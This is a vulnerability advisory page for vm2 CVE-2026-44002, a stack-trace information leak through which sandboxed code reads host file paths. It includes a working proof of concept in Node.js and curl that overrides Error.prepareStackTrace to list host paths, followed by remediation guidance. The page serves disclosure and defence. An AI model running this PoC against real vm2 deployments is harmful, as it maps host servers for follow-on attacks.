vm2 CVE-2026-44002
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.
Details
In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:
getFileName()- returns host absolute paths like/app/node_modules/vm2/lib/vm.jsgetLineNumber(),getColumnNumber()- exact source locationsgetFunctionName(),getMethodName(),getTypeName()- internal function names
Two exploitation paths exist:
- Default
error.stack:new Error().stackincludes host frame paths in the formatted string - Custom
prepareStackTrace: Attacker can setError.prepareStackTraceto directly callgetFileName()on each CallSite, extracting a clean list of all host paths
PoC
Library-level PoC (Node.js script - primary):
const { VM } = require("vm2");
const vm = new VM();
// Path A - Default error.stack
const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
console.log(result1);
// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
// /app/src/server.js:49:20
// Path B - prepareStackTrace extraction
const result2 = vm.run(`
Error.prepareStackTrace = function(e, sst) {
return sst.map(function(s) { return s.getFileName(); }).join(", ");
};
new Error().stack
`);
console.log(result2);
// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...HTTP demonstration:
# Default error.stack
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"try { null.x; } catch(e) { e.stack }"}'
# Result includes host paths: /app/src/server.js, /app/node_modules/express/...
# prepareStackTrace extraction
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...Impact
- Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
- Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
- Scope: All applications using vm2. No special configuration required.
AnalysisAI
Information disclosure in vm2 allows sandboxed code to extract host absolute file paths, library locations, and internal function names via stack trace inspection, enabling attackers to map the host server's directory structure and architecture without authentication or user interaction. The vulnerability affects all versions up to 3.10.5 and is triggered through either default error.stack formatting or custom Error.prepareStackTrace handlers; vendor-released patch available in version 3.11.0.
Technical ContextAI
vm2 is a Node.js sandbox library that restricts code execution by wrapping host V8 CallSite objects (which represent stack frames). The wrapper class in lib/setup-sandbox.js blocks getThis() and getFunction() to prevent host object leakage, but fails to sanitize getFileName(), getLineNumber(), getColumnNumber(), getFunctionName(), getMethodName(), and getTypeName() methods. These methods return unfiltered host runtime data including absolute filesystem paths. The root cause (CWE-209: Information Exposure Through an Error Message) stems from incomplete sanitization of a security wrapper-the developers blocked direct object reference leakage but left metadata paths unsanitized. CPE pkg:npm/vm2 <= 3.10.5 is affected. Two distinct exploitation paths exist: passive observation of default error.stack formatting which includes host frames, or active manipulation via Error.prepareStackTrace to directly enumerate all host file paths without triggering exceptions.
RemediationAI
Upgrade vm2 to version 3.11.0 or later immediately. The upstream fix sanitizes CallSite wrapper methods to prevent path disclosure while maintaining sandbox isolation. No workarounds are recommended for production environments running untrusted code, as error handling and stack trace inspection are fundamental JavaScript features that cannot be reliably disabled from the sandbox boundary. Organizations unable to upgrade should implement network-level segmentation to restrict outbound connections from sandboxed execution contexts and monitor error logs for suspicious stack trace extraction patterns, though these are compensating controls with significant operational overhead and should not delay patching.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-209 – Error Message Information Leak
View allSame technique Information Disclosure
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-v27g-jcqj-v8rw